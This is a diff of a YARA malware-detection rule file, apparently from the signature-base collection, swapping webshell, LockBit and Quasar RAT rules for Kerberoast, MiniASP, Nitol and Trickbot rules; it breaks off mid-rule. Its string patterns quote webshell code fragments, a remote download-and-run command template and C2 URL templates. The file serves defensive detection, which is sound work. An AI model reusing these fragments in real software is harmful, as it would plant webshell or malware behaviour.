-		description = "Detects malware from NK APT incident DE"
+		description = "Auto-generated rule - file GetUserSPNs.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0122bb03-8ff0-554d-8fee-458f0ddd7664"
-		date = "2017-11-17"
-		modified = "2025-11-03"
-		reference = "Internal Research - ON"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9852-L9871"
+		id = "a2fba75c-264f-5e89-afaf-9d19a4a90784"
+		date = "2016-05-21"
+		modified = "2023-12-05"
+		reference = "https://github.com/skelsec/PyKerberoast"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_kerberoast.yar#L25-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c5bc3ee0218d4ce6902e49d7f938264ecd158f1f458e2fcef878f06f003ed08"
+		logic_hash = "204b009677a02bf8725f928c2bfff321b4543a883760e312a0c92f187684c8e9"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ed6e2e0027d3f564f5ce438984dc8a54577df822ce56ce079c60c99a91d5ffb1"
+		hash1 = "1b69206b8d93ac86fe364178011723f4b1544fff7eb1ea544ab8912c436ddc04"
 
 	strings:
-		$x1 = "Obfuscation provided by FOPO" fullword ascii
-		$s1 = "\";@eval($" ascii
-		$f1 = { 22 29 29 3B 0D 0A 3F 3E }
+		$s1 = "$ForestInfo = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()" fullword ascii
+		$s2 = "@{Name=\"PasswordLastSet\";      Expression={[datetime]::fromFileTime($result.Properties[\"pwdlastset\"][0])} } #, `" fullword ascii
+		$s3 = "Write-Host \"No Global Catalogs Found!\"" fullword ascii
+		$s4 = "$searcher.PropertiesToLoad.Add(\"pwdlastset\") | Out-Null" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x3f3c and filesize < 800KB and ( $x1 or ( $s1 in ( 0 .. 350 ) and $f1 at ( filesize -23 ) ) )
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Jexboss_JSP_1 : FILE
+rule SIGNATURE_BASE_Kerberoast_PY
 {
 	meta:
-		description = "Detects JexBoss JSPs"
+		description = "Auto-generated rule - file kerberoast.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fe7a20b-dc2b-509b-bcf8-e3bfbbe7431a"
-		date = "2018-11-08"
-		modified = "2025-11-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9873-L9890"
+		id = "cea6cdb2-cd1a-5701-a9d1-27c788a962a7"
+		date = "2016-05-21"
+		modified = "2023-12-05"
+		reference = "https://github.com/skelsec/PyKerberoast"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_kerberoast.yar#L43-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f540bbc88bffd0c961837416bd5166fd3cb54b6124ffffbf1cd60e49ab01bd30"
+		logic_hash = "3b285cc55733bd4c499ffb4821a92675806bf66faf3b3565ffb6de867bed538d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "41e0fb374e5d30b2e2a362a2718a5bf16e73127e22f0dfc89fdb17acbe89efdf"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "73155949b4344db2ae511ec8cab85da1ccbf2dfec3607fb9acdc281357cdf380"
 
 	strings:
-		$x1 = "equals(\"jexboss\")"
-		$x2 = "%><pre><%if(request.getParameter(\"ppp\") != null &&" ascii
-		$s1 = "<%@ page import=\"java.util.*,java.io.*\"%><pre><% if (request.getParameter(\""
-		$s2 = "!= null && request.getHeader(\"user-agent\"" ascii
-		$s3 = "String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }}%>" fullword ascii
+		$s1 = "newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)" fullword ascii
+		$s2 = "key = kerberos.ntlmhash(args.password)" fullword ascii
+		$s3 = "help='the password used to decrypt/encrypt the ticket')" fullword ascii
+		$s4 = "newencserverticket = kerberos.encrypt(key, 2, e, nonce)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 1KB and 1 of ( $x* ) or 2 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Jexboss_WAR_1 : FILE
+rule SIGNATURE_BASE_APT_Malware_Commentcrew_Miniasp : FILE
 {
 	meta:
-		description = "Detects JexBoss versions in WAR form"
+		description = "CommentCrew Malware MiniASP APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0973f6cf-8a5f-5449-812e-36aa6b9939df"
-		date = "2018-11-08"
-		modified = "2025-11-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9892-L9915"
+		id = "a434012d-d13a-5061-a1d8-180d2c5828e8"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_miniasp.yar#L2-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ee9cb22496d2e36d215caa9c7e295b41cb8434322a0097bbc3d1a365dce0c156"
+		logic_hash = "f382dd802f0332c99b1d33cf1dcd99ba7fad344a381152ebadfb69bc74c4e58f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "6271775ab144ce9bb9138bf054b149b5813d3beb96338993c6de35330f566092"
-		hash2 = "6f14a63c3034d3762da8b3ad4592a8209a0c88beebcb9f9bd11b40e879f74eaf"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "0af4360a5ae54d789a8814bf7791d5c77136d625"
+		hash1 = "777bf8def279942a25750feffc11d8a36cc0acf9"
+		hash2 = "173f20b126cb57fc8ab04d01ae223071e2345f97"
 
 	strings:
-		$ = "jbossass" fullword ascii
-		$ = "jexws.jsp" fullword ascii
-		$ = "jexws.jspPK" fullword ascii
-		$ = "jexws1.jsp" fullword ascii
-		$ = "jexws1.jspPK" fullword ascii
-		$ = "jexws2.jsp" fullword ascii
-		$ = "jexws2.jspPK" fullword ascii
-		$ = "jexws3.jsp" fullword ascii
-		$ = "jexws3.jspPK" fullword ascii
-		$ = "jexws4.jsp" fullword ascii
-		$ = "jexws4.jspPK" fullword ascii
+		$x1 = "\\MiniAsp4\\Release\\MiniAsp.pdb" ascii
+		$x2 = "run http://%s/logo.png setup.exe" fullword ascii
+		$x3 = "d:\\command.txt" fullword ascii
+		$z1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR " ascii
+		$z2 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)" fullword ascii
+		$z3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC" ascii
+		$s1 = "http://%s/device_command.asp?device_id=%s&cv=%s&command=%s" fullword ascii
+		$s2 = "kill process error!" fullword ascii
+		$s3 = "kill process success!" fullword ascii
+		$s4 = "pickup command error!" fullword ascii
+		$s5 = "http://%s/record.asp?device_t=%s&key=%s&device_id=%s&cv=%s&result=%s" fullword ascii
+		$s6 = "no command" fullword ascii
+		$s7 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii
+		$s8 = "command is null!" fullword ascii
+		$s9 = "pickup command Ok!" fullword ascii
+		$s10 = "http://%s/result_%s.htm" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 4KB and 1 of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) ) or ( all of ( $z* ) ) or ( 8 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Webshell_Tinyasp : FILE
-{
-	meta:
-		description = "Detects 24 byte ASP webshell and variations"
-		author = "Jeff Beley"
-		id = "38b1f61b-e506-59b2-9157-d0345431c429"
-		date = "2019-01-09"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9917-L9928"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d8b7db89ea623d5bcf14476779df727827cfc752d4c6ba4208445fd7305e6943"
-		score = 75
-		quality = 83
-		tags = "FILE"
-		hash1 = "1f29905348e136b66d4ff6c1494d6008ea13f9551ad5aa9b991893a31b37e452"
-
-	strings:
-		$s1 = "Execute Request" ascii wide nocase
 
-	condition:
-		uint16( 0 ) == 0x253c and filesize < 150 and 1 of them
-}
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Mar21_1 : FILE
+rule SIGNATURE_BASE_MAL_Nitol_Malware_Jan19_1 : FILE
 {
 	meta:
-		description = "Detects ASPX Web Shells"
+		description = "Detects Nitol Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "52884135-6b86-5e3e-a866-36a812d5a9af"
-		date = "2021-03-12"
-		modified = "2025-11-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9930-L9956"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0c20163871bf424c0b594c4b75d35e782df03761552f792474761c603ddb8478"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		hash1 = "10b6e82125a2ddf3cc31a238e0d0c71a64f902e0d77171766713affede03174d"
-		hash2 = "170bee832df176aac0a3c6c7d5aa3fee413b4572030a24c994a97e70f6648ffc"
-		hash3 = "31c4d1fc81c052e269866deff324dffb215e7d481a47a2b6357a572a3e685d90"
-		hash4 = "41b5c26ac194439612b68e9ec6a638eceaf00842c347ffa551eb009ef6c015a3"
-		hash5 = "4b645bc773acde2b3cc204e77ac27c3f6991046c3b75f42d12bc90ec29cff9e3"
-		hash6 = "602bb701b78895d4de32f5e78f3c511e5298ba244b29641b11a7c1c483789859"
-		hash7 = "7ac47a17c511e25c06a53a1c7a5fbbf05f41f047a4a40b71afa81ce7b59f4b03"
-		hash8 = "9a5097d0e8dc29a2814adac070c80fd4b149b33e56aaaf9235af9e87b0501d91"
-		hash9 = "9efb5932c0753e45504fc9e8444209b92c2bdf22e63b1c1a44e2d52cb62b4548"
-		hash10 = "d40b16307d6434c3281374c0e1bbc0f6db388883e7f6266c3c81de0694266882"
-
-	strings:
-		$s1 = ".StartInfo.FileName = 'cmd.exe';" ascii
-		$s2 = "<xsl:template match=\"\"/root\"\">" ascii fullword
-		$s3 = "<?xml version=\"\"1.0\"\"?><root>test</root>\";" ascii fullword
-
-	condition:
-		uint16( 0 ) == 0x253c and filesize < 6KB and all of them
-}
-rule SIGNATURE_BASE_MAL_RANSOM_LNX_Macos_Lockbit_Apr23_1 : FILE
-{
-	meta:
-		description = "Detects LockBit ransomware samples for Linux and macOS"
-		author = "Florian Roth"
-		id = "c01cb907-7d30-5487-b908-51f69ddb914c"
-		date = "2023-04-15"
+		id = "5b9968a8-31ba-593b-9e01-b69a4e31fe65"
+		date = "2019-01-14"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/malwrhunterteam/status/1647384505550876675?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit_lnx_macos_apr23.yar#L2-L41"
+		reference = "https://twitter.com/shotgunner101/status/1084602413691166721"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mal_nitol.yar#L4-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6d838e8b207b97d7c335dc4066de2c6dc87f7adc9cac31742677edbe85386cf7"
-		score = 85
+		logic_hash = "4607496beb37500637c1e5509b42c0fe6f9e79548c85603819dc966fa2cc2be0"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0a2bffa0a30ec609d80591eef1d0994d8b37ab1f6a6bad7260d9d435067fb48e"
-		hash2 = "9ebcbaf3c9e2bbce6b2331238ab584f95f7ced326ca4aba2ddcc8aa8ee964f66"
-		hash3 = "a405d034c01a357a89c9988ffe8a46a165915df18fd297469b2bcaaf97578442"
-		hash4 = "c9cac06c9093e9026c169adc3650b018d29c8b209e3ec511bbe34cbe1638a0d8"
-		hash5 = "dc3d08480f5e18062a0643f9c4319e5c3f55a2e7e93cd8eddd5e0c02634df7cf"
-		hash6 = "e77124c2e9b691dbe41d83672d3636411aaebc0aff9a300111a90017420ff096"
-		hash7 = "0be6f1e927f973df35dad6fc661048236d46879ad59f824233d757ec6e722bde"
-		hash8 = "3e4bbd21756ae30c24ff7d6942656be024139f8180b7bddd4e5c62a9dfbd8c79"
+		hash1 = "fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e"
 
 	strings:
-		$x1 = "restore-my-files.txt" ascii fullword
-		$s1 = "ntuser.dat.log" ascii fullword
-		$s2 = "bootsect.bak" ascii fullword
-		$s3 = "autorun.inf" ascii fullword
-		$s4 = "lockbit" ascii fullword
-		$xc1 = { 33 38 36 00 63 6D 64 00 61 6E 69 00 61 64 76 00 6D 73 69 00 6D 73 70 00 63 6F 6D 00 6E 6C 73 }
-		$xc2 = { 6E 74 6C 64 72 00 6E 74 75 73 65 72 2E 64 61 74 2E 6C 6F 67 00 62 6F 6F 74 73 65 63 74 2E 62 61 6B }
-		$xc3 = { 76 6D 2E 73 74 61 74 73 2E 76 6D 2E 76 5F 66 72 65 65 5F 63 6F 75 6E 74 00 61 2B 00 2F 2A }
-		$op1 = { 84 e5 f0 00 f0 e7 10 40 2d e9 2e 10 a0 e3 00 40 a0 e1 ?? fe ff }
-		$op2 = { 00 90 a0 e3 40 20 58 e2 3f 80 08 e2 3f 30 c2 e3 09 20 98 e1 08 20 9d }
-		$op3 = { 2d e9 01 70 43 e2 07 00 13 e1 01 60 a0 e1 08 d0 4d e2 02 40 }
+		$xc1 = { 00 25 75 20 25 73 00 00 00 30 2E 30 2E 30 2E 30
+               00 25 75 20 4D 42 00 00 00 25 64 2A 25 75 25 73
+               00 7E 4D 48 7A }
+		$xc2 = "GET ^&&%$%$^" ascii
+		$n1 = ".htmGET " ascii
+		$s1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
+		$s2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+		$s3 = "User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0" fullword ascii
+		$s4 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and ( 1 of ( $x* ) or 3 of them ) or 2 of ( $x* ) or 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "286870a926664a5129b8b68ed0d4a8eb" or 1 of ( $x* ) or #n1 > 4 or 4 of them )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_1 : FILE
 {
 	meta:
-		description = "Detects indicators found in LockBit ransomware"
-		author = "Florian Roth"
-		id = "75dc8b95-16f0-5170-a7d6-fc10bb778348"
-		date = "2023-04-17"
+		description = "Detects Trickbot malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b428cbf9-0796-5a01-9b98-28e1bc6827cc"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://objective-see.org/blog/blog_0x75.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit_lnx_macos_apr23.yar#L43-L67"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L3-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd5bffa5571abfd1446b065d26c8c23f00fe1376d505af539c6f37356014a86f"
+		logic_hash = "fef15c0bda6dc2b28f34791da3ca68a03f7368b63ead17e631a2d4f05d1b40e2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "58852140a2dc30e799b7d50519c56e2fd3bb506691918dbf5d4244cc1f4558a2"
+		hash2 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
+		hash3 = "9d6e4ad7f84d025bbe9f95e74542e7d9f79e054f6dcd7b37296f01e7edd2abae"
 
 	strings:
-		$xe1 = "-i '/path/to/crypt'" xor
-		$xe2 = "http://lockbit" xor
-		$s1 = "idelayinmin" ascii
-		$s2 = "bVMDKmode" ascii
-		$s3 = "bSelfRemove" ascii
-		$s4 = "iSpotMaximum" ascii
-		$fp1 = "<html"
+		$s1 = "Celestor@hotmail.com" fullword ascii
+		$s2 = "\\txtPassword" ascii
+		$s14 = "Invalid Password, try again!" fullword wide
+		$op1 = { 78 c4 40 00 ff ff ff ff b4 47 41 }
+		$op2 = { 9b 68 b2 34 46 00 eb 14 8d 55 e4 8d 45 e8 52 50 }
 
 	condition:
-		(1 of ( $x* ) or 4 of them ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 3 of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Locker_LOG_Apr23_1
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_2 : FILE
 {
 	meta:
-		description = "Detects indicators found in LockBit ransomware log files"
-		author = "Florian Roth"
-		id = "aa0a2393-e5a2-5151-8afb-91a9bb922179"
-		date = "2023-04-17"
+		description = "Detects Trickbot malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2ff69a51-d089-53e5-ab19-4fbdf20f90f8"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://objective-see.org/blog/blog_0x75.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit_lnx_macos_apr23.yar#L69-L84"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L24-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d5f96e601150209382d3f6458863bc79768beb99b587aa8d9ba37cb2c11ef634"
+		logic_hash = "185e59c156218b418bec0c94144b19639c17e3a9595d993e3761eae15379f9fb"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
+		hash2 = "d75561a744e3ed45dfbf25fe7c120bd24c38138ac469fd02e383dd455a540334"
 
 	strings:
-		$s1 = " is encrypted. Checksum after encryption "
-		$s2 = "~~~~~Hardware~~~~"
-		$s3 = "[+] Add directory to encrypt:"
-		$s4 = "][+] Launch parameters: "
+		$x1 = "C:\\Users\\User\\Desktop\\Encrypt\\Math_Cad\\Release\\Math_Cad.pdb" fullword ascii
+		$x2 = "AxedWV3OVTFfnGb" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1
-{
-	meta:
-		description = "Detects forensic artifacts found in LockBit intrusions"
-		author = "Florian Roth"
-		id = "e716030c-ee78-51dc-919c-cf59e93da976"
-		date = "2023-04-17"
-		modified = "2023-12-05"
-		reference = "https://objective-see.org/blog/blog_0x75.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit_lnx_macos_apr23.yar#L86-L101"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "81021f8c9aed17c007d7329a598c644a706fa9750818c8974984eefcba8d06c2"
-		score = 75
-		quality = 85
-		tags = ""
 
-	strings:
-		$x1 = "/tmp/locker.log" ascii fullword
-		$x2 = "Executable=LockBit/locker_" ascii
-		$xc1 = { 54 6F 72 20 42 72 6F 77 73 65 72 20 4C 69 6E 6B 73 3A 0D 0A 68 74 74 70 3A 2F 2F 6C 6F 63 6B 62 69 74 }
-
-	condition:
-		1 of ( $x* )
-}
-rule SIGNATURE_BASE_Beepservice_Hacktool : FILE
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_3 : FILE
 {
 	meta:
-		description = "Detects BeepService Hacktool used by Chinese APT groups"
+		description = "Detects Trickbot malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8813a01a-10db-52e7-bb1e-322864e87b15"
-		date = "2016-05-12"
+		id = "3428b7e3-def9-5574-bbbb-6ba98c134dec"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/p32Ozf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_beepservice.yar#L10-L31"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L40-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "176136e8a5ffec258caebf8d6b452b556093c5998414a7c9a4451ad78482f862"
-		score = 85
+		logic_hash = "87860212077b63bf3e4835a3a64b934fc7edd3258355a3e94a69acaba39c2516"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "032df812a68852b6f3822b9eac4435e531ca85bdaf3ee99c669134bd16e72820"
-		hash2 = "e30933fcfc9c2a7443ee2f23a3df837ca97ea5653da78f782e2884e5a7b734f7"
-		hash3 = "ebb9c4f7058e19b006450b8162910598be90428998df149977669e61a0b7b9ed"
-		hash4 = "6db2ffe7ec365058f9d3b48dcca509507c138f19ade1adb5f13cf43ea0623813"
+		hash1 = "25a4ae2a1ce6dbe7da4ba1e2559caa7ed080762cf52dba6c8b55450852135504"
+		hash2 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
+		hash3 = "d75561a744e3ed45dfbf25fe7c120bd24c38138ac469fd02e383dd455a540334"
+		hash4 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
+		hash5 = "e92dd00b092b435420f0996e4f557023fe1436110a11f0f61fbb628b959aac99"
 
 	strings:
-		$x1 = "\\\\%s\\admin$\\system32\\%s" fullword ascii
-		$s1 = "123.exe" fullword ascii
-		$s2 = "regclean.exe" fullword ascii
-		$s3 = "192.168.88.69" fullword ascii
+		$s1 = "Decrypt Shell Fail" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and $x1 and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and ( 1 of them or pe.imphash ( ) == "4e3fbfbf1fc23f646cd40a6fe09385a7" )
 }
-rule SIGNATURE_BASE_Quasar_RAT_1 : FILE
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_4 : FILE
 {
 	meta:
-		description = "Detects Quasar RAT"
+		description = "Detects Trickbot malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "36220de3-aa1a-5c34-adae-432d939c811e"
-		date = "2017-04-07"
+		id = "dcadaa50-52ae-5ded-b40e-149f28092093"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quasar_rat.yar#L10-L33"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L58-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7cceccb7c283774318f6285b482a422566f4f821eb51d564104205783401931a"
+		logic_hash = "c109510d86260b4173bbbac5fe69936acb109e7fdbe71fbe2955e5ed85f5cd85"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740"
-		hash2 = "1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec"
-		hash3 = "515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89"
-		hash4 = "f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34"
+		hash1 = "25a4ae2a1ce6dbe7da4ba1e2559caa7ed080762cf52dba6c8b55450852135504"
+		hash2 = "e92dd00b092b435420f0996e4f557023fe1436110a11f0f61fbb628b959aac99"
+		hash3 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
+		hash4 = "9ecc794ec77ce937e8c835d837ca7f0548ef695090543ed83a7adbc07da9f536"
 
 	strings:
-		$s1 = "DoUploadAndExecute" fullword ascii
-		$s2 = "DoDownloadAndExecute" fullword ascii
-		$s3 = "DoShellExecute" fullword ascii
-		$s4 = "set_Processname" fullword ascii
-		$op1 = { 04 1e fe 02 04 16 fe 01 60 }
-		$op2 = { 00 17 03 1f 20 17 19 15 28 }
-		$op3 = { 00 04 03 69 91 1b 40 }
+		$x1 = "c:\\users\\user\\documents\\visual studio 2005\\projects\\adzxser\\release\\ADZXSER.pdb" fullword ascii
+		$x2 = "http://root-hack.org" fullword ascii
+		$x3 = "http://hax-studios.net" fullword ascii
+		$x4 = "5OCFBBKCAZxWUE#$_SVRR[SQJ" fullword ascii
+		$x5 = "G*\\AC:\\Users\\911\\Desktop\\cButtonBar\\cButtonBar\\ButtonBar.vbp" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of ( $s* ) or all of ( $op* ) )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_Quasar_RAT_2 : FILE
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_5 : FILE
 {
 	meta:
-		description = "Detects Quasar RAT"
+		description = "Detects Trickbot malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0ca795c5-3631-5a99-8675-37558485f478"
-		date = "2017-04-07"
+		id = "b3034f0c-5fd9-58a2-866f-9100e3a56f39"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_quasar_rat.yar#L35-L59"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_trickbot.yar#L79-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b113cb63b0bb75766c905dd3b327b1b2df228733622df8f7517d3daed72432a3"
+		logic_hash = "e304b236dd58faa0e6fdd73bc93c24f6ff0ec6c1f9a54b104f8e87441834e22b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740"
-		hash2 = "515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89"
-		hash3 = "f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34"
+		hash1 = "58852140a2dc30e799b7d50519c56e2fd3bb506691918dbf5d4244cc1f4558a2"
+		hash2 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
+		hash3 = "9ecc794ec77ce937e8c835d837ca7f0548ef695090543ed83a7adbc07da9f536"
+		hash4 = "9d6e4ad7f84d025bbe9f95e74542e7d9f79e054f6dcd7b37296f01e7edd2abae"
 
 	strings:
-		$x1 = "GetKeyloggerLogsResponse" fullword ascii
-		$x2 = "get_Keylogger" fullword ascii
